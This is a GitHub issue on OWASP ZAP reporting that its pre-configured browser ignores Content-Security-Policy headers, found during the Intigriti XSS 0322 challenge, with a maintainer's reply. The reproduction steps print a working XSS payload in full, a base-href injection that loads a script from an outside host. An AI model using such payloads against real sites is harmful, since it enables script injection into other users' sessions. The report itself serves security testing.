CSP does not seem to work normally in launched browser

[hahwul]

Describe the bug

Hi team.
This is an issue that I experienced while solving the intigrity XSS 0322 challenge recently.
CSP exists in Response as shown below, but CSP is not processed in Pre-configured browser.

Of course, I spent a little more time and eventually bypassed CSP. However, I was excited for a while because of the alert() of the pre-configured browser at the beginning of the test.

However, analysts who use ZAP should also be protected by CSP and normal operation of CSP is required for accurate testing. Submit because it appears to be an issue :D

Request

POST https://challenge-0322.intigriti.io/challenge/LoveReceiver.php HTTP/1.1

token=b037132edc1c393820596e2bfd647b05823ed1c779950cd4eb2263fa0a32ebfe&FirstText=%3Cbase+href%3D%27https%3A%2F%2Fpocs.hahwul.com%2F%27%3E%3Cscript+src%3D%27%2Falert.js%27%3E%3C%2Fscript%3E&Hashing=aaa

Response header

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 14:09:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1476
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
content-security-policy: default-src 'none'; style-src 'nonce-ba27d332f3cb20800894e2bf6e7f61e3aeb6bd04'; script-src 'nonce-ba27d332f3cb20800894e2bf6e7f61e3aeb6bd04'; img-src 'self'
Vary: Accept-Encoding

I checked the options and scripts just in case the CSP Disable option was turned on, but there was nothing like that.

Steps to reproduce the behavior

1. Open https://challenge-0322.intigriti.io/challenge/LoveSender.php page
2. Input payload

Plain text: `<base href='https://pocs.hahwul.com/'><script src='/alert.js'></script>`
Hashing algorithm: aaaa

3. A script is inserted into the Response and is protected by the CSP. Of course, the core of this challenge was CSP, but in the ZAP Pre-configured browser, the CSP is ignored and the script works.

Expected behavior

XSS code is not work (because, protected from CSP)

Software versions

OWASP ZAP
Version: 2.11.1
---
Installed Add-ons: [[id=accessControl, version=7.0.0],
[id=alertFilters, version=13.0.0], [id=allinonenotes,
version=2.0.0], [id=amf, version=3.0.0], [id=ascanrules,
version=46.0.0], [id=ascanrulesAlpha, version=37.0.0],
[id=ascanrulesBeta, version=40.0.0],
[id=attacksurfacedetector, version=1.1.4], [id=authstats,
version=2.0.0], [id=automation, version=0.14.0],
[id=browserView, version=5.0.0], [id=bruteforce,
version=11.0.0], [id=bugtracker, version=3.0.0],
[id=callgraph, version=5.0.0], [id=callhome, version=0.3.0],
[id=codedx, version=9.0.0], [id=commonlib, version=1.9.0],
[id=communityScripts, version=14.0.0], [id=custompayloads,
version=0.11.0], [id=diff, version=11.0.0],
[id=directorylistv1, version=5.0.0],
[id=directorylistv2_3_lc, version=4.0.0], [id=domxss,
version=12.0.0], [id=encoder, version=0.6.0],
[id=evalvillain, version=0.1.1], [id=exim, version=0.1.0],
[id=fileupload, version=1.1.0], [id=formhandler,
version=4.0.0], [id=fuzz, version=13.6.0], [id=fuzzdb,
version=8.0.0], [id=gettingStarted, version=13.0.0],
[id=graaljs, version=0.2.0], [id=graphql, version=0.9.0],
[id=groovy, version=3.1.0], [id=help, version=14.0.0],
[id=highlighter, version=8.0.0], [id=hud, version=0.13.0],
[id=imagelocationscanner, version=3.0.0], [id=importurls,
version=9.0.0], [id=invoke, version=11.0.0], [id=jruby,
version=8.0.0], [id=jsonview, version=2.0.0], [id=jwt,
version=1.0.2], [id=jython, version=12.0.0], [id=kotlin,
version=1.1.0], [id=neonmarker, version=1.4.0], [id=network,
version=0.2.0], [id=oast, version=0.10.0], [id=onlineMenu,
version=9.0.0], [id=openapi, version=27.0.0], [id=plugnhack,
version=12.0.0], [id=portscan, version=9.0.0],
[id=pscanrules, version=40.0.0], [id=pscanrulesAlpha,
version=35.0.0], [id=pscanrulesBeta, version=29.0.0],
[id=quickstart, version=33.0.0], [id=reflect,
version=0.0.11], [id=regextester, version=2.0.0],
[id=replacer, version=9.0.0], [id=reports, version=0.13.0],
[id=requester, version=5.0.0], [id=retest, version=0.2.0],
[id=retire, version=0.10.0], [id=reveal, version=4.0.0],
[id=revisit, version=4.0.0], [id=saml, version=9.0.0],
[id=saverawmessage, version=7.0.0], [id=savexmlmessage,
version=0.3.0], [id=scripts, version=30.0.0], [id=selenium,
version=15.8.0], [id=sequence, version=6.0.0], [id=soap,
version=13.0.0], [id=spiderAjax, version=23.7.0],
[id=sqliplugin, version=15.0.0], [id=sse, version=10.0.0],
[id=svndigger, version=4.0.0], [id=tips, version=9.0.0],
[id=tokengen, version=15.0.0], [id=treetools,
version=8.0.0], [id=viewstate, version=3.0.0],
[id=wappalyzer, version=21.9.0], [id=webdrivermacos,
version=37.0.0], [id=websocket, version=25.0.0], [id=zest,
version=35.0.0]]
---
Operating System: Mac OS X
Java Version: Eclipse Foundation 11.0.12
System's Locale: ko_KR
Display Locale: en_GB
Format Locale: ko_KR
ZAP Home Directory: /Users/ichei/Library/Application Support/ZAP/
ZAP Installation Directory: /Applications/OWASP ZAP.app/Contents/Java/./
Look and Feel: FlatLaf Dark (com.formdev.flatlaf.FlatDarkLaf)

Screenshots

No response

Errors from the zap.log file

No response

Additional context

No response

Would you like to help fix this issue?

• Yes

[kingthorin]

I've added both the "add-on" and "Component-Docs" labels until we decide how we want to address this. Also I've removed "bug" and added "enhancement" as (as far as I know) this is intentional, so adding and option etc would be an enhancement.

[hahwul]

Hi @kingthorin
Thank you so very very much!
I don't know if I can be of any help, but I'll try my best to test it(If you need my help). I'm rooting for you!